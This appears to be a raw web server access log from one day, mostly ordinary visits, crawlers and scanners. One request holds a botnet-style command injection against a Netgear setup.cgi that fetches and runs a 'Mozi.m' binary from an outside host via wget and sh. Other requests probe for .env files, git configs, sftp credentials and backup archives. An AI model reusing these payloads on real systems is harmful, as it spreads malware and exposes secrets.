154.81.156.54 - - [21/Apr/2025:02:15:59 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:02:19:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
209.141.52.16 - - [21/Apr/2025:02:33:23 +0200] "\x16\x03\x01" 400 383 "-" "-"
209.141.52.16 - - [21/Apr/2025:02:33:25 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
209.141.52.16 - - [21/Apr/2025:02:33:26 +0200] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
209.141.52.16 - - [21/Apr/2025:02:33:27 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
209.141.52.16 - - [21/Apr/2025:02:33:27 +0200] "GET /.config/sftp.json HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
209.141.52.16 - - [21/Apr/2025:02:33:27 +0200] "GET /sftp.json HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
154.81.156.54 - - [21/Apr/2025:02:35:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:02:56:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:03:21:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:03:22:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:03:38:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:03:48:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:03:57:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.104.241.98 - - [21/Apr/2025:04:06:33 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
172.104.241.98 - - [21/Apr/2025:04:06:33 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) AppleWebKit/605.1.15 (KHTML"
172.104.241.98 - - [21/Apr/2025:04:06:34 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14 like Mac OS X) AppleWebKit/605.1.15 (KHTML"
172.104.241.98 - - [21/Apr/2025:04:06:43 +0200] "\x16\x03\x01\x02" 400 383 "-" "-"
172.104.241.98 - - [21/Apr/2025:04:06:43 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
172.104.241.98 - - [21/Apr/2025:04:06:43 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [21/Apr/2025:04:08:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [21/Apr/2025:04:20:04 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
20.65.193.189 - - [21/Apr/2025:04:29:18 +0200] "GET /druid/index.html HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [21/Apr/2025:04:33:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.75.212.115 - - [21/Apr/2025:04:41:54 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
210.50.98.51 - - [21/Apr/2025:04:55:14 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
210.50.98.51 - - [21/Apr/2025:04:55:14 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
154.81.156.54 - - [21/Apr/2025:04:58:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.133.0 - - [21/Apr/2025:05:03:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.255.122.19 - - [21/Apr/2025:05:06:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:05:08:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [21/Apr/2025:05:14:25 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
195.211.191.170 - - [21/Apr/2025:05:22:22 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.98 Chrome/71.0.3578.98 Safari/537.36"
185.218.86.4 - - [21/Apr/2025:05:30:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:05:30:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:05:50:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.102.173.71 - - [21/Apr/2025:06:14:05 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible; MojeekBot/0.11; +https://www.mojeek.com/bot.html)"
5.102.173.71 - - [21/Apr/2025:06:14:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; MojeekBot/0.11; +https://www.mojeek.com/bot.html)"
154.81.156.54 - - [21/Apr/2025:06:19:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
117.210.212.238 - - [21/Apr/2025:06:19:15 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.210.212.238:41840/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-"
185.255.122.19 - - [21/Apr/2025:06:24:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [21/Apr/2025:06:29:08 +0200] "\x16\x03\x01" 400 383 "-" "-"
20.29.46.165 - - [21/Apr/2025:06:45:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [21/Apr/2025:06:45:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
139.59.37.187 - - [21/Apr/2025:06:47:10 +0200] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
139.59.37.187 - - [21/Apr/2025:06:47:24 +0200] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
139.59.37.187 - - [21/Apr/2025:06:47:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [21/Apr/2025:06:55:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:07:06:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:07:17:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.101 - - [21/Apr/2025:07:37:13 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
196.251.70.87 - - [21/Apr/2025:07:45:55 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36"
43.166.142.76 - - [21/Apr/2025:07:47:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [21/Apr/2025:07:50:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:08:03:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.211.191.76 - - [21/Apr/2025:08:18:30 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.0 Safari/537.36"
154.81.156.54 - - [21/Apr/2025:08:21:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.83 - - [21/Apr/2025:08:40:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:08:47:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:08:54:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:08:56:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.146.19 - - [21/Apr/2025:09:14:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
81.40.94.113 - - [21/Apr/2025:09:18:33 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
80.75.212.115 - - [21/Apr/2025:09:20:24 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
185.191.127.222 - - [21/Apr/2025:09:33:02 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [21/Apr/2025:09:33:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [21/Apr/2025:09:35:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.80.2 - - [21/Apr/2025:09:40:54 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)"
154.81.156.54 - - [21/Apr/2025:09:47:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.189.182.234 - - [21/Apr/2025:09:53:06 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
20.65.194.85 - - [21/Apr/2025:10:04:55 +0200] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [21/Apr/2025:10:11:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
122.51.242.63 - - [21/Apr/2025:10:18:32 +0200] "HEAD /mail.universimed.pl.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:33 +0200] "HEAD /mailuniversimedpl.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:34 +0200] "HEAD /wz.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:36 +0200] "HEAD /sql.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:39 +0200] "HEAD /wwwroot.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:40 +0200] "HEAD /index.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:40 +0200] "HEAD /old.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:41 +0200] "HEAD /web.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:41 +0200] "HEAD /upload.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:42 +0200] "HEAD /website.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
122.51.242.63 - - [21/Apr/2025:10:18:42 +0200] "HEAD /wangzhan.rar HTTP/1.1" 404 - "-" "python-requests/2.31.0"
185.255.122.19 - - [21/Apr/2025:10:24:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:10:28:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.226.34.130 - - [21/Apr/2025:10:45:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.226.34.130 - - [21/Apr/2025:10:47:24 +0200] "" 400 383 "-" "-"
18.226.34.130 - - [21/Apr/2025:10:49:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
18.226.34.130 - - [21/Apr/2025:10:52:25 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:10:54:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [21/Apr/2025:10:55:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.226.34.130 - - [21/Apr/2025:10:55:35 +0200] "SSH-2.0-Go" 400 383 "-" "-"
18.226.34.130 - - [21/Apr/2025:10:57:14 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:11:02:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:11:26:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.72 - - [21/Apr/2025:11:31:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
64.62.197.69 - - [21/Apr/2025:11:34:23 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0"
64.62.197.63 - - [21/Apr/2025:11:35:00 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
64.62.197.68 - - [21/Apr/2025:11:35:42 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
64.62.197.68 - - [21/Apr/2025:11:35:53 +0200] "GET /phpinfo.php HTTP/1.1" 200 10245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
64.62.197.76 - - [21/Apr/2025:11:35:55 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
47.128.45.7 - - [21/Apr/2025:11:36:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.34.66 - - [21/Apr/2025:11:37:09 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.115.150 - - [21/Apr/2025:11:38:03 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.120.63 - - [21/Apr/2025:11:38:19 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.119.217 - - [21/Apr/2025:11:38:33 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.54 - - [21/Apr/2025:11:45:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
170.106.35.187 - - [21/Apr/2025:12:02:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.255.122.19 - - [21/Apr/2025:12:06:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:12:10:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
157.245.183.133 - - [21/Apr/2025:12:19:04 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
157.245.183.133 - - [21/Apr/2025:12:19:04 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
154.81.156.54 - - [21/Apr/2025:12:33:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [21/Apr/2025:12:35:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
86.146.110.186 - - [21/Apr/2025:12:42:26 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
5.183.209.244 - - [21/Apr/2025:12:42:48 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [21/Apr/2025:12:49:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.169 - - [21/Apr/2025:12:58:41 +0200] "\x16\x03\x01" 400 383 "-" "-"
198.235.24.169 - - [21/Apr/2025:12:58:41 +0200] "\x16\x03\x01" 400 383 "-" "-"
141.98.11.83 - - [21/Apr/2025:13:05:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
115.231.78.11 - - [21/Apr/2025:13:06:01 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
115.231.78.11 - - [21/Apr/2025:13:06:21 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
115.231.78.11 - - [21/Apr/2025:13:06:22 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
154.81.156.54 - - [21/Apr/2025:13:19:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.71.106 - - [21/Apr/2025:13:23:01 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36"
185.255.122.19 - - [21/Apr/2025:13:31:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.79.139.4 - - [21/Apr/2025:13:34:26 +0200] "\x16\x03\x01" 400 383 "-" "-"
34.79.139.4 - - [21/Apr/2025:13:34:27 +0200] "OPTIONS / HTTP/1.0" 200 423 "-" "-"
154.81.156.54 - - [21/Apr/2025:13:35:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [21/Apr/2025:13:46:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.164.107.5 - - [21/Apr/2025:14:12:44 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [21/Apr/2025:14:18:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
144.91.110.164 - - [21/Apr/2025:14:22:00 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
93.174.93.12 - - [21/Apr/2025:14:24:10 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13"
194.164.107.5 - - [21/Apr/2025:14:29:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
185.255.122.19 - - [21/Apr/2025:14:32:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
